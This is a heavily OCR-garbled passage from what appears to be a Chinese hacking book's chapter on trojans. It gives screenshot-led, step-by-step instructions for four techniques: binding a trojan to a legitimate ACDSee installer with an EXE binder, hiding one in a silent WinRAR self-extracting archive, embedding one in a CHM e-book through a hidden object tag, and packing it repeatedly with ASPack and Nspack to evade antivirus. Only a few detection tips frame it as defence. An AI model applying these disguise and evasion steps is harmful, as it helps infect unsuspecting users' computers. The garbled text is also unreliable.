空 文件 夹 ， 由 于 很 多 人 有 连续 点 击 的 习惯 ， 点 到 那个 伪装 成 文件 夹 木马 时 ， 也 会 收 不 住 
鼠标 继续 点 下 去 ， 这 样 木 马 就 成 功 运行 了 。 识 别 方法 : 不 要 隐藏 系统 中 已 知 文件 类 型 的 
扩展 名 称 。 

6. 给 木马 服务 端 程序 更 名 

木马 服务 端 程序 的 命名 有 很 大 的 学 问 。 如 果 使 用 原来 的 名 字 而 不 做 任何 修改 ， 谁 不 
知道 这 是 个 木马 程序 昵 ? 所以， 木马 的 命名 也 是 干 奇 百 怪 。 不 过 ， 大 多 是 改 为 和 系统 文 
件 名 类 似 的 名 字 ， 如 果 用 户 对 系统 文件 不 够 了 解 ， 可 束 危 险 了 。 例 如 ， 有 的 木马 把 名 子 
改 为 window.exe， 还 有 的 更 改 后 级 名 ， 比 如 把 dll 改 为 dll (注意 是 数字 “11” 而 非 英 文 
字母 “11” 等 。 

7. 藏身 于 系统 文件 夹 中 

由 于 用 户 在 服务 问 打 开 含 有 木马 的 文件 后 ， 木 马 会 将 目 己 复 制 到 Windows 的 系统 文件 
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夹 〈 一 般 位 于 C: \Windows\system) 中 。 一般 来 说 ， 原 木马 文件 和 系统 文件 夹 中 的 木马 文件 


大 小 一 样 ( 捆 绑 文件 的 木马 除外 ) 只 要 在 近来 收 到 的 信件 和 下 载 的 软件 中 找到 原木 号 文件 ， 
再 去 系统 文件 夹 中 碍 找 相 同 大 小 的 文件 ， 判 断 哪个 是 木马 ， 将 其 删除 即 可 。 





9.2.2 木马 捆绑 技术 阳光 


墨客 可 以 使 用 木马 拥 绑 技 术 将 一 个 正 第 的 可 执行 文件 和 木马 拥 绑 在 一 起 。 一 旦 用 户 运 
行 这 个 舍 有 本 马 的 可 执行 文件 ， 束 可 以 实现 通过 木马 控制 或 攻击 用 户 的 计算 机 的 目的 。 下 
面 主要 以 EXE 捆绑 机 来 讲解 如 何 将 木 瑟 捆绑 到 可 执行 文件 上 。 

EXE 捆绑 机 可 以 将 两 个 可 执行 文件 (EXE 文件 ) 捆绑 成 一 个 文件 ， 运 行 捆绑 后 的 文件 
等 于 同时 运行 两 个 文件 。 它 会 目 动 更 改 独 标 ， 使 捆绑 后 的 文件 与 拥 绑 前 的 文件 图 标 一 样 。 
具体 过 程 曝光 如 下 。 


STEP01: 双击 ExeBinderexe 文件 STEP02: 指定 第 一 个 可 执行 文件 


EXE 捆 包机 8.3 版 - 网 站 : www.netthiefnet QQ : 1050271066 











[指定 


一 个 可 执行 文件 ] 


第 
请 指定 第 一 个 可 执行 文件 ， 这 是 第 一 个 押 针 文件 ， 氮 儿 后 的 文件 将 与 它 一 样 ， 
不 重要 化 。 


第 一 个 可 执行 文件 的 路 径 为 : 


要 继续 ， 请 点 击 “ 下 一 步 ”。 
如 果 软 件 不 能 运 软件 简介 .bxt 
二 /nm 


和。 法 十 


ExeBinder.exe 和 修改 日 期 : 20I 


应 用 程序 六 小 : 68|0 KB 
创建 日 期 : 20114/2/9 15:08 


下 载 并 解压 EXE 文件 捆绑 机 ， 打 开 相 应 文件 夹 后 双 启动 EXE 捆绑 机 后 单 击 “点 击 这 里 指定 第 一 个 可 
击 ExeBinder.exe 文件 。 执行 文件 ”按钮 。 


STEP03: 选择 需要 执行 的 文件 STEP04: 查看 生成 的 文件 路 径 








一 个 可 执行 妇 件 ] 
认可 册 行文 件 ， 这 是 第 一 个 押 寺 文件 ， 所 多 后 的 文件 持 与 它 一 样 ， 
“ct 


第 一 个 可 执行 文件 的 路 径 为 : 
D: “安装 软件 \『【 批 量 下 载 】 ACDSeepro6. 1. 197_Lite 等 \ 图 像 视频 等 





点 击 这 里 指定 第 一 个 可 执行 文件 


I 喇 4L8QD1ETPGK\ 











ee 国 要 继续 ， 请 点 击 “ 下 一 步 ”。 
文件 名 (N): acdsee-pro-6-32bit.exe 
mo [了 
打开 “请 指定 第 一 个 可 执行 文件 ” 单 击 “ 打 ”可 以 看 到 指定 的 文件 路 径 出 现在 文本 框 中 , 单 击 “ 下 
对 话 框 后 ， 选 择 需要 执行 的 文件 。 ” 开 ”" 按钮 。 一 步 ” 按 钮 。 
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FF 天 一 


ll 


pa 





PE 
STEP05: 指定 第 二 个 可 执行 文件 


EXE 搓 劣 宙 8.3 版 - 网 站 : www.netthiefnet QQ : 1050271066 


[指定 第 二 个 可 执行 文件 ] 
将 提 二 第 一 个 可 执行 文件 这 是 第 二 个 捆 乡 文件 ， 捆 绑 后 的 文件 将 看 不 到 它 的 


第 二 个 可 执行 文件 的 路 径 为 : 


点 击 这 里 指定 第 二 个 可 执行 文件 加 


要 继续 ， 请 点 击 “ 下 一 





取消 | 
单 击 “ 点 击 这 里 指定 第 二 个 可 执行 文件 ”按钮 。 
STEP07: 查看 生成 的 文件 路 径 
EXE 搁 绕 机 8.3 版 - 网 站 : www.netthief.net QQ : 1050271066 


[指定 第 二 个 可 执行 文件 ] 
靖 撕 定 第 一 个 可 执行 久 件 ， 这 是 第 二 个 捆 绪 交 件 ， 捆 绪 后 的 交 件 将 看 不 到 它 的 


第 二 个 FI 执行 灾 件 的 咯 径 为 ; 


LD:\Documents\l. exe 


点 击 这 里 指定 第 二 个 可 执行 文件 


要 继续 9 请 点 击 吕 下 一 步 CG 





< 上 一 步 ) | 下 一 步 员 > 





可 以 看 到 指定 的 文件 路 径 出 现在 文本 框 中 , 单 击 "下 单 击 “点 


一 步 ”按钮 。 


STEP09: 输入 文件 名 称 


六 朗 ACDSee.Pro.v6.2.212 


==-- 支 持 小 站 请 
帮忙 点 去 --== 


acdsee-pro-6-3 
2bit.exe 


攻防 从 入 门 到 精通 











在 “文件 名 ”文本 
框 中 输入 文件 名 称 。 


单 击 “ 保 存 ” 
按钮 。 
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> 





STEP06: 选择 木马 文件 
请 指定 第 二 个 可 执行 文件 : 

组 织 新 建文 件 夫 
| “ 文档 库 


包括 : 3 个 位 置 





排列 方式 : 文件 夹 


I 加 计算 机 
入 本 地 磁盘 (C:) 
号 本 地 磁盘 (D:) 
后 本 地 磁盘 (E:) 
Ea 本 地 磁盘 (F:) 
Ga tutuDisk (W:) ”一 
由 MSN 上 的 “我 好 


> 








巨 定义 Office 模 
板 


4 公用 文档 (5) 
Cn 用 户 \ 公 用 


售 网 络 
Ji 加 4L8QD1ETPGK\ 
i 三 LSM 


pe sc Wh hh Wh 


文件 各 (N): lexe | - 











单 击 “ 打 
开 ” 按 钮 。 


打开 “请 指定 第 二 个 可 执行 
文件 ”对话 框 后， 选择 木马 文件 。 
STEP08: 指定 保存 路 径 


EXE 捆 纤 宙 8.3 版 - 网 站 : www.netthief.net QQ : 1050271066 


[指定 保存 路 径 ] 
请 指定 捆 钴 后 的 文件 保存 到 哪里 。 


保存 路 径 为 : 


点 击 这 里 指定 保存 路 径 


要 继续 ,请 点 击 “ 下 | 一步 ”。 





《上 一 步 @) | 下 一 步 0n >| 取消 | 


这 里 指定 保存 路 径 ” 按 钮 。 





STEP10: 返回 “指定 保存 路 径 ” 对 话 


EXE 搓 纤 宙 8.3 版 - 网 站 : www.netthief.net QQ : 1050271066 





[指定 保存 路 径 ] 
请 指定 捆 兰 后 的 文件 保存 到 哪里 。 


保存 路 径 为 : 
D0: 安装 软件 *『【 批 里 下 载 】 ACDSeePro6. 1. 197_Lite 等 \ 图 像 视频 等 红 


点 击 这 里 指定 保存 路 径 


要 继续 ， 请 点 击 “ 下 一 步 ”。 





可 以 看 到 指定 的 文件 路 径 出 现在 文本 框 中 , 单 击 “下 
一 步 ” 按钮 。 


EE 





木马 攻防 


STEP11: 选择 版 本 STEP12: 捆绑 文件 


EXE 舞 综 视 8.3 版 - 网 站 : www.netthief.net QQ : 1050271066 [S| EXE 押 绕 机 8.3 版 - 网 站 : www.netthief.net QQ : 1050271066 


[选择 版 本 ] 
请 选择 软件 的 版 本 类 型 。 [捆绑 文件 ] 


版 本 类 型 : 开始 捆绑 第 一 个 可 执行 文件 与 第 二 个 可 执行 文件 ， 生 成 捆 纪 后 的 文件 。 


TCR 人 
由 于 某 些 原因， “普通 版 9 很 可 能 会 被 条 毒 软件 查 东 。 请 在 
风 放 和 人 宣 共 。 请 在 


要 退出 ， 请 点 击 “ 惠 消 ” 








要 维 续 s 请 点 击 下 一 步 号 天 








国 选 择 “ 普 通 版 " 或 “个 国 单 击 “下 一 单 击 “点 击 这 里 开始 捆绑 文件 ”按钮 。 
(推荐 ) ”。 步 ”按钮 。 
STEP13: 关闭 杀毒 软件 提示 STEP14: 捆绑 文件 成 功 提示 


| 


[ 捆 乡 文件 ] 


二 开始 捆 绪 第 一 个 可 执行 如 人 
人 由 于 有 某 些 原因 ， "普通 版 ”很 可 能 会 被 杀毒 软件 查 杀 ， 请 先 关闭 杀毒 软 
DD 件 ! 











单 击 “确定 ”按钮 。 单 击 “确定 ”按钮 。 
STEP15: 查看 捆绑 成 功 的 文件 


be < ACD... » ACDSee.Pro… ”| 她 间 状 芝 ACDSee.Pro.v6.2212InclKey... 六 


文件 (日 ”编辑 (E) ”查看 (V) ”工具 (T) ”帮助 (H) 
组 织 Y 打开 新 建文 件 夫 


人 - 捆绑 成 功 的 文件 。 


风 下 载 
转 京 面 
闻 最 近 访 问 的 位 置 





acdsee-pro-6-3 acdsee-pro-6-3 acdsee-pro-6-3 
2bit.exe 21bit.exe 22bit.exe 








在 执行 过 程 中 最 好 将 第 一 个 可 执行 文件 作为 正常 的 可 执行 文件 ， 第 二 个 


可 执行 文件 作为 木马 文件 ， 这 样 捆绑 后 的 文件 图 标 会 与 正 第 的 可 执行 文件 图 
提示 。 标 相同 ， 





3.2.3” 目 解压 捆绑 木马 曝光 


随 独 网 络 安全 水 平 的 提高 ， 木 马 很 容易 束 被 查 杀 出 来 ， 因 此 木马 种 植 者 会 想 出 各 种 办 
法 伪装 和 隐藏 上 自己 的 行为 ， 利 用 WinRAR 目 解 压 功 能 捆绑 木马 就 是 手段 之 一 。 有 具体 过 程 曝 
Eu hs 
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EE 
取 
靳 全 人 人 他 


STEP01: 准备 捆绑 文件 


和 


装 | 用 ， 计算 机 、 本 地 磁盘 (E) ， acdsee-pro-6-32bit 


rn 








文件 (PH ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 
组 织 ~ 包含 到 库 中 ~ 新 建文 件 夫 


竟 最 后方 问 的 位 置 


= 库 acdsee-pro-6-3 
pe 2bit.exe 


加 5 


中 中 看 国 





将 要 捆绑 的 文件 放 在 同一 个 文件 夹 内 。 


STEP03: 设置 压缩 参数 





压 饥 充 件 外 ) 
新 建文 件 来 (2). exe 
更 新 方式 WW) 
[| 
压 锦 交 件 格 式 压缩 选项 
(@) RAR (R) 
®®@ ZIP () 


四 添加 用 户 身 众 校 验 信息 IT) 
丫 添 加 恢复 记录 f) 
压缩 分 卷 大 小 , 字 节 (WW) 回 ] 测 试 压缩 文件 外) 
”7 加 炙 定 压缩 文件 


压缩 方 式 CC) 


勾 选 “创建 自 解压 格式 压缩 文件 ” 复 选 框 。 
STEP05: 设置 安静 模式 


党 机 | 高 级 | 模式 
临时 模式 
回 解 包 到 临时 文件 来 0) 
可 选 的 询问 @) 


询问 标题 部 











安静 模式 

辐 全 部 显示 心 ) 

辐 隐藏 启动 对 话 框 (3) 
司 全 部 隐藏 00 


选中 “全 部 隐藏 ” 单 选 按钮 。 
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攻防 从 入 门 到 精通 


STEP02: 添加 到 压缩 文件 





+ > EE GI CT 
文件 (” 编 坊 (E) 查看) 工具 (T) 者 助 (H) 
组 织 图 打开 新 建文 件 去 





右 击 需要 捆绑 的 文件 ， 在 快捷 菜单 中 选择 “添加 到 


压条 区 作 ” 人 Sa 
STEP04: 切换 至 “高 级 ”选项 卡 


NTFS 选项 
回 保存 文件 安全 数据 8) 
回 保 存 文件 流 数 据 立 ) 


Ds ER 
口 每 个 分 卷 操 作 完 之 后 秋 停 庄 缚 人 


LI 旧 风格 分 卷 名 区) 自 解压 选项 %)... 


i EF 
系统 

四 后 台 压 缩 名 ) 

门 完成 操作 后 关闭 计算 机 电源 企 ) 

站 如果 其 它 让 nRAR 副本 被 激活 则 等 待 i) 


单 击 “ 自 解压 选项 ”按钮 。 
STEP06: 切换 至 “文本 和 图 标 ” 选 项 卡 


恢 旷 记录 ER) 


Lo 国 s 








自 船 讨 文 件 窗口 标题 上 


acdsee-pro-b-32blit. exe 


目 解 讨 交 件 北口 中 显示 的 文本 以) 


acdsee-pro-B-32bit. exel 








| 浏览 和 0 


具 文 件 加 载 自 解压 徽标 6) 


从 文件 加 载 自 解压 文件 图 标 CL) 
| 取消 
填写 自 解 压 文件 窗口 贺 单 击 “确定 ” 


标题 ”以 及 “ 自 解 压 文件 窗 按钮 。 
口中 显示 的 文本 ”。 








< 第 s 章 





木马 攻防 


STEP07: 查看 注释 内 容 STEP08: 查看 生成 的 自 解压 压缩 文件 











从 文件 中 加 载 注释 多) 
| 





手动 输入 注释 内 容 C) 
下面 的 宇 释 包含 自 解 压 肝 本 命令 


Silent=1 
Title=acdsee-pro-B-32bit. exe 
Text 


acdsee-pro-6-3 | acdsee-pro-6-3 
2bit (2).exe 2bit.exe 


{ 
dsee-pro-B-32bit. exe| 


国 迅雷 下 载 
直 言 乐 





单 击 “ 确 定 ”按钮 。 自 解压 的 压缩 文件 。 
5.2:4 《HM 木马 曝光 


CHM 木马 就 是 将 一 个 网 页 木马 添加 到 CHM 电子 书 中 , 用 户 在 运行 该 电子 书 时 , 木马 也 
会 随 之 运行 。 在 制作 CHM 木马 前 ， 需 要 准备 3 个 软件 ， 即 QuickCHM 软件 、 木 马 程序 以 及 
CHM 电子 书 。 准 备 好 之 后 ， 便 可 通过 反 编 译 和 编译 操作 将 木马 添加 到 CHM 电子 书 中 。 

下 面 将 曝光 CHM 木马 的 生成 过 程 。 


























STEP01: 准备 3 个 必 备 软件 STEP02: 打开 CHM 电子 书 
之 上 计算 机 ， 本 地 磁盘 (E:) ;新 建文 件 夫 ， 计算 机 类 ， 旦 宕 电子 1 下 载 ”新 建文 
文件 (F) ”编辑 (E) ”前 看 (V) 工具 (D ”帮助 (H) 隐藏 上 -上 | 主 失 选 硕 儿 ) 
组 织 ” 刻 打 开 ~ 新 建文 件 闪 目录 | alo | 
7 收 藏 夫 本 L Qui cldCHM 想 x] 术 
轧 下 载 A 四 国 gnicHN 的 二 
加 点 本 遍 rr 由 : 电 使 用 手册 
通 最 后 访问 的 位 置 | “二 ] 软件 注册 
help.chm | qchm2.6_cn.exe 木马 .exe a 意见 尺 庄 
己 库 作 更 轻松 。 
恒 PPTV 视 频 是 
QuickCHM 
EE 外 秆 语言 包 ， 
-| 图 片 计 优 秀 、 体 贴 用 
汪 Yd » 得 
盖 迅 二 下 载 
动 言 示 CHM 格 式 简 介 
双击 CHM 文档。 右 击 任意 位 置 ， 在 ee “属性 ”命令 。 
STEP03: 查看 页 面 默认 地 址 STEP04: 编写 网 页 代码 


新 建文 本 文档 ,txt - 记事 本 
区 域 : 我 的 电脑 | 保护 模式 : 、 
地 址 : nk: MSTTSt ore: E: “新 建 
(URL) i 音 


1 下 <meta htt hh” 
ee meta http-equiys— 
名 件 夹 \help. /AboutQui ckCHM. htm content=” 3:url=” ci i CkCHM. htm| “> 
大 小 : ”| 不 可 用 





<object width=0 height= 0 
创建 时 间 :| 站 可 用 style=” display: none : 


修改 时 间 :| 不 可 用 


” codebase=” 





国 记录 当前 页 面 国 单 击 “ 确 定 " 按钮 。 在 记事 本 中 编写 网 页 代码 ， 并 将 记录 的 地 址 和 木马 
的 默认 地 址 。 程序 名 称 添加 到 代码 中 。 
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售 人 他 他 


STEP05: 保存 网 页 代码 





Ctrl+N 
Ctrl+ 口 
Ctrl+S 


boutQuickCHM. htm “> 


Ctrl+P ght=0 





攻防 从 入 门 到 精通 


x—oleobject” codebase=” 


选择 “文件 ”> “另存 为 


)， 和 人 八 
DD Xo 


STEP07: ”启动 QuickCHM 软件 


SS QuickCHM 2.6 


IE x 








文件 (RP ”主题 (0) 索引。 编 轧 (E) 格式 (M) 插入 (N) 

9 新 建 (N) 

人 B 打开 (O) 
最 近 打 开 (R) 





|eslx 帮 入 X| 国 || -1 
;上 [| -IT -| 川 图 


素 格 (mn 间 者 (V) 选项 (P) 帮助 (H) 


ee 
i 








编 如 | 源 文件 | 预 和 








起 CHM 向 导 (W) 
及 编译 (P) 


| eal 











区 欧阳 区 直 | 全 | 他 





STEP09: 查看 反 编 译 


k 件 (DJ) ”编辑 (E) ”可 看 (V) 工具 (T) 帮助 (H) 


组 织 ” 个 Open with QuickCHM v 电子 部 件 新 建文 件 夫 

六 收藏 失 匀称 修改 日 期 
是 下 载 Dh images 2014/2/10 16:55 
国 桌面 © AboutQuickCHM.htm 2014/2/10 16:55 
邓 最 近 访 问 的 位 置 § DeCompile.htm 2014/2/10 16:55 


© FEEDBACKHTM 2014/2/10 16:55 


本 Filelist.htm 2014/2/10 16:55 
司库 = 





[DD help.hhc 2014/2/10 16:55 
加 | PPTV 视 大 -一 一 一 2014/2/10 16:55 
国 视 页 本 2014/2/10 16:55 
到 图 片 © Keyboard.htm 2014/2/10 16:55 
国文 档 而 Newl.ht 2014/2/10 16:55 
一 迅雷 下 载 New2.ht 2014/2/10 16:55 
由 音乐 ©] New3.ht 2014/2/10 16:55 

©] New4.ht 2014/2/10 16:55 

网 京 里 组 目 Register.ht 2014/2/10 16:55 

十 SetupQutkCHM.htm 2014/2/10 16:55 

吕 计算 机 二 UseChm.ht 2014/2/10 16:55 
色 下 Wizard, 2014/2/10 16:55 
BB 本 地 瑞 盘 (Dj) 

3 本 地 开盘 (E:) 
ea 本 地 焉 盘 (F:) 


找到 后 缀 名 为 “.hhp ”的 文件 。 
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后 的 文件 


DO | ， 计算 机 ， 本 地 磁盘 (E:) ， 新 建文 件 夫 ， 计算 机 类 ， 是 客 电 子 1 下 载 ， 新 建文 件 夫 ， 反 编 译文 件 》 


兴 型 


立信 
文件 突 


360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 


HHC 文件 
HHK File 
HHP File 


360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 
360 se HTML Do... 





STEP06: 选择 保存 位 置 


习 另存 为 


名 站 -| < 二 YH ， 计 咎 MI 类 ， 寻 和 电子 1 下 载 ， 新建 文件 夫 ed Reds 















修改 日 期 


2014/2/10 16:20 


ea tutuDisk (W:) E 
品 MSN 上 的 “我 有 


名 网 络 
[ 旺 4L8QD1ETPGKY _ 


文件 名 (N): 1html 


保存 类 型 m): | 站 本 文档 ("bq) 




















填写 文件 名 ， 注 
后 级“.html"。 


单 击 “ 保 存 ” 
按钮 。 


STEPO8: 


| 会 QuickCHM 2.6 
文件 (有 ”主题 (O) 豪 引 上 编 丝 (E) 格式 (M) 插入 (N) 礁 格 (TM) 前 春 (V) 选项 (P) 帮助 (H) 
IB Joeemlx 全 名 x| 昌 || | ee eee Tee | 


[本 EL EE 


对 文件 进行 反 编 译 


己 | 回 | 习 || 




















选择 电子 书 路 径 及 反 
编译 后 的 文件 路 径 。 


STERIO: 


help.hhp - 记事 本 
文件 (PP 编 辑 (E) ”格式 (DO) ”查看 (V) | 帮助 (H) | 
[OPTIONS] 


单 击 “ 确 定 ” 
按钮 。 


用 记事 本 打开 .hhp 文件 





Contents file=help. hhc 

Index file=help. hhk 

Default font= 微 软 雅 黑 
Language=0x804 中 文 (简体 ， 中 国 ) 


[WINDOWS] 
Main=”help”, “help. hhc”, “help. hhk”,,,,,,, 0x20, 150, 
0x104E, [400, 1, 800, 451], 0x0, 0x0,,,,,0 


[FILES]| 





查看 HHP 文 件 对 应 的 代码 。 


STEP11: 


修改 HHP 文件 代码 


STEP12: 


改变 网 页 文件 以 及 木马 文件 位 置 











司 help.hhp - 记事 本 
生生 有 ”计算 机 本 地 磁盘 (E:) ， 新 建文 件 夫 计算 机 类 ， 旦 客 电 子 1 下 载 ， 新 建文 件 夫 ， 反 编 泽 文件 
文件 口 “ 编 加 (E)“ 格 z(O)“ 坦 看 (V) “帮助 (H) re 
[OPTIONS] 组 织 [3 打开 电子 部 件 新 建文 件 去 
Compatibility=1. 1 a Ee EE Er en 
Compatibility=1.1 Or later . 
到 吕 六 下 载 images _2014/2/10 16:55 _ 文 件 件 夹 有 天 
Default Window=Main 园 点 丁 | Lhtml 2014/2/10 16:39 360 se HTML Do... 1 KB 
Contents file=help. hhec 到 最 返 访问 的 位 置 AboutQuickCHM.htm 2014/2/10 16:55 360 se HTML Do... 2 KB 
Index file=help. hhk BH DeCompile.htm 2014/2/10 16:55 360 se HTML Do... 1 KB 
= 库 © FEEDBACK.HTM 2014/2/10 16:55 360 se HTML Do... 2 KB 
Default font= 软 雅 黑 2 a 司 Filelist.htm 2014/2/10 16:55 。 360 se HTML Do... 1 KB 
Language= =0x804 中 Se 简体， 乡 中 国 ) = a | | help.hhc 2014/2/10 16:55 ”HHC 文件 KB 
help.hhk 2014/2/10 16:55 HHK File 2 KB 
图 图片 司 help.hhp 2014/2/10 17:16 HHP 文件 1KB 
[WINDOWS] i RL El p= 国 闵 桥 人 Keyboard.htm 2014/2/10 16:55 。 360 se HTML Do... 3 KB 
Main= help help. hhc 四 help. hhk 1. html es Pe 闻 迅雷 下 载 二 Newl.htm 2014/2/10 16:55 360 se HTML Do... 2 KB 
x20, 150, 0xl104E， [400, 1, 800, 451] , Ox0, Ox0,,,,,0 二 音乐 © New2.htm 2014/2/10 16:55 。 360 se HTML Do... 2KB 
下 New3.htm 2014/2/10 16:55 。 360 se HTML Do... 2 KB 
网 训话 组 总 New4.htm 2014/2/10 16:55 360 se HTML Do... 2 KB 
Register.htm 2014/2/10 16:55 。 360 se HTML Do... 4 KB 
| 地 计算 机 下 SetupQuickCHM.htm 2014/2/10 16:55 。 360 se HTML Do... 2 KB 
UseChm.htm 2014/2/10 16:55 360 se HTML Do... 2 KB 
本 地 磋 租 (C 可 
二 站。 © Wizard.htm 2014/2/10 16:55 360 se HTML Do... 2 KB 
be | 四 ] 木马 .exe 2014/2/10 11:24 ”应 用 程序 OKB| 
3 本 地 夏 盘 (E; 
5B 本 地 磋 盘 (F:) 








在 代码 中 添加 之 前 编写 的 网 页 文件 名 及 木马 名 。 将 网 页 文件 ( 1.html ) 和 木马 文件 ( 木马 .exe ) 复 


制 到 反 编译 后 的 文件 夹 中 。 
STEP14: 选择 要 打开 的 文件 


多 QuickCHM 2.6 EE 
文件 (Pi 主题 (O) ”索引 编辑 (E) 格式 (M) 揪 入 (N) 表 稿 (D) 查看 (V) 选项 (P) 帮助 (H) 
| 加 全 图 | ge 全 | | Fomat | Element | Table | < | 
| | -les -| n rvl 生 二 人 内 


STEP13: 重新 运行 QuickCHM 软件 


SS QuickCHM 2.6 | | 日 53 

文件 (F) 主题 (0) 索引 (MD) 编辑 (E) 格式 (M) 插入 (N) ”表格 (D) 查看 (V) 选项 (P) 帮助 (H) 

ET Jomlx 人 BX| || i 1 | | [ram Eomert| Tabie | | 
EE || 因 | a 7 ul|EE 皇 候 埋 


最 近 寺 开 (R) “下 
编 泗 | 源 文件 | 预览 | 






































查找 范围 [I): | 反 编译 文件 *| 牛 因 他 国 7 


名 称 修改 日 期 
品 images 2014/2/10 16:55 


{3 help.hhp 2014/2/10 17:16 





过 CHM 和 局 导 (W) 
有》 编译 用 

到 编 洋 (D) 
坊 打印 中 

返 出 ( 昌 


所 | 全 | 个 罗 

















< La ' 
i 二 
文件 类 型 (T): [Project files (*. hhp) 了 | 本 


田 ICopyribht 2001-2C 才 


选 定 刚才 修改 的 help.hhp 文 件 , 并 单 击 "“ 打 开 ” 按钮 。 
STEP16: 编译 完成 

作 QuickCHM 2.6 - [未 注册 ] - help.hhp | | 

文件 (F) 主题 (QO) 索引 QD) 编辑 (E) 格式 (M) 插入 (N) 表格 (1 童 看 (V) 选项 (P) 帮助 (H) 


ead aXJELTE 国 || T | Format | Element| Table | 4| "| 
| I RF || 国 || a 7z vl| 丘 汪 全 *#,| 


B 录 | 率 引 | 
图: 日 克 QuickCHM 柱 这 使 


XSDE 


v- 


田 ] Copyright 2001-2C 才 


选择 “文件 >“ 打开 ”命令 。 
STEP15: 返回 QuickCHM 软件 主 界 面 


你 QuickCHM 2.6 - [未 注册 ] - help.hhp Eo 

文件 (F) ”主题 (0) 索引) 编辑 (E) 格式 (M) 插入 (N) 表格 (1) 音 者 (V) 选项 (P) 帮助 (H) 

加 新 十 (N) lom|lx 人 BX || -qiEenenlTael| 

B 打开 (O) | B ZII| 三 手 
晤 近 打 开 (R) 2 
关闭 (C) 

图 保存 [S) 
另存 为 (A) 

才 CHM 向 导 (W) 


















































a [em | 








?> 完成 ! 你 希望 运行 吗 ? 











区 侈 区 区 外 | 全 | 中 

















|Copyright 2001-2C 多 


单 击 “ 否 ”按钮 。 此 时 CHM 电子 书 木 马 已 经 制作 
完成 ， 生 成 的 电子 书 保存 在 反 编 译文 件 夹 内 。 








选择 “文件 ”>“ 编 译 ” 命 令 。 


毒 软件 、 金山 毒 


霸 等 即 可 查 杀 并 清除 CHM 木马 。 
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EA 
取 RT 


Pe > 
源 全- 攻防 从 入 门 到 精通 








木马 的 加 壳 与 脱 过 


加 有 元 了 加 是 将 一 个 可 执行 程序 中 的 各 种 资源 ， 包 括 对 exe.dll 等 文件 进行 压缩 。 压 缩 后 的 
可 执行 文件 依然 可 以 正确 运行 ， 运 行 前 移 在 内 存 中 将 各 种 资源 解压 绝 ， 再 调 入 资源 执行 程 
序 。 加 有 元 后 的 文件 变 小 了 ， 而 且 文 件 的 运行 代码 已 经 发 生变 化 ， 从 而 避免 被 木马 碍 杀 软 件 
扫描 出 来 并 奏 杀 。 加 壳 后 的 木马 也 可 通过 专业 软件 得 看 是 否 加 壳 成 功 。 胶 壳 正 好 与 加 元 相 
反 ， 指 脱 反 加 在 木马 外 面 的 “ 壳 ?， 脱 元 后 的 木马 很 容易 被 杀毒 软件 扫描 并 奋 杀 。 


5.3.{ 使 用 APack 加 过 曝光 


ASPack 是 一 球 非 常 好 的 32bit PE 格式 的 可 执行 文件 压缩 软件 , 通常 是 将 文件 夹 进行 压 
缩 , 用 来 缩小 其 存储 空间 。 但 压缩 后 的 文件 不 能 再 运行 了 , 如 果 想 运行 , 必须 解压 缩 。 ASPack 
是 专门 用 于 对 WIN32 可 执行 程序 进行 压缩 的 工具 ,压缩 后 程序 能 正常 运行 ,丝毫 不 会 受到 
任何 影响 。 而 且 即 使 已 经 将 ASPack 从 系统 中 删除 ， 压 缩 过 的 文件 仍 可 正常 使 用 。 
下 面 将 曝光 ASPack 对 木马 加 壳 的 具体 步骤 。 
STEP01: 运行 ASPack STEP02: 切换 至 “打开 文件 ”选项 卡 


内 ASpack 2.28 E | ASPack 2.28 [| ~ lm 











[| 

































































“win32EXE.DLL 压缩 器 Win32 EXE. DLL 压 闯 器 


共享 软件 版 本 。 注 册 给 : ASPack 共享 软件 版 本 。 注 册 给 : 
Black Riders Black Riders 
20111 20111 


版 本 2.28 














打开 文件 | 压缩 | 选项 | 关于 | 帮助 | 





文件 信息 





文件 名 
lw 加 载 后 立即 执 和 


厂 完成 后 出 [aspack 。 段 名 称 省 压缩 前 长 度 
厂 最 大 程度 压缩 | -二 





























加 切换 至 “选项 " 选 ” 国 设置 不 创建 备份 文件 。 单 击 “ 打 开 ” 按 钮 。 
项 卡 。 

STEP03: 选择 要 加 元 的 文件 STEP04: 开始 压缩 
法 选择 要 压缩 的 文件 | | 半 ASPack 2.28 


查找 范围 部 ): | 国 文档 -| 全 国 绊 国 > win32 EXE. DLL 压缩 器 


We | Black Riders 
| 版 本 ”2.28 2011! 
: 


| E 了 打开 文件 压缩 | 选项 | 关于 | 帮助 | 
压缩 进程 











E 
自 定 多 Of 人 fce 模 上 ”木马 .exe 

















选 吓 要 加 壳 的 木马 程序 后 单 击 “打开 ”按钮 。 单 击 “ 开 始 ” 按 钮 进行 压缩 。 
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Ys 





木马 攻防 


STEP05: 完成 加 壳 


YW ASPack 2.28 





win32 ExE. DLL 压 绵 改 


; Black Riders 
2011! 


版 本 2.28 














打开 文件 | 压缩 | 选项 | 关于 | 帮助 | 











木马 .exe 


压 葡 前 长 度 73 728 113 字 节 


压缩 后 长 度 52 224 字 节 切换 至 “打开 文件 ”选项 卡 , 可 以 看 到 木马 程序 压缩 
前 和 压缩 后 的 文件 大 小 。 

















9.4.2 ”使 用 “北斗 程序 压缩 ”进行 多 次 加 壳 


虽然 为 木马 加 这 可 以 使 其 虑 过 某 些 杀毒 软件 ， 但 还 会 有 一 些 特别 强 的 杀毒 软件 仍然 可 
以 得 杀 出 只 加 过 一 次 过 的 木马 ,所 以 只 有 进行 多 次 加 有 壳 才 能 保证 不 和 被 杀毒 软件 得 杀 。“ 北斗 
程序 压缩 ”(Nspack) 是 一 亚 拥 有 目 主 知识 产权 的 压缩 软件 , 是 一 个 exe/dll/ocx/ser 等 32 位 、 
64 位 可 运行 文件 的 压缩 句 。 压 缩 后 的 程序 可 减少 程序 在 网 络 上 的 上 传 和 下 载 时 间 。 

使 用 “北斗 程序 压缩 ”给 木马 服务 端 进 行 多 次 加 过 的 具体 操作 步骤 曝光 如 下 。 











STEP01: 运行 “北斗 程序 压 缩 ” 软 件 STEP02: 切换 至 “文件 压缩 ”选项 卡 


文件 @) 选项 人 @) 帮助 00 文件 四) 选项 @) 帮助 00 
如 文件 压缩 | 般 目录 压缩 | 喇 配置 渤 项 | 去 关于 | 如 文件 压缩 | 季 目录 压缩 | 司 配置 选项 | 礁 关于 | 
压缩 资源 末 乱 虞 重 定位 节 斤 泊 压缩 程序 … 

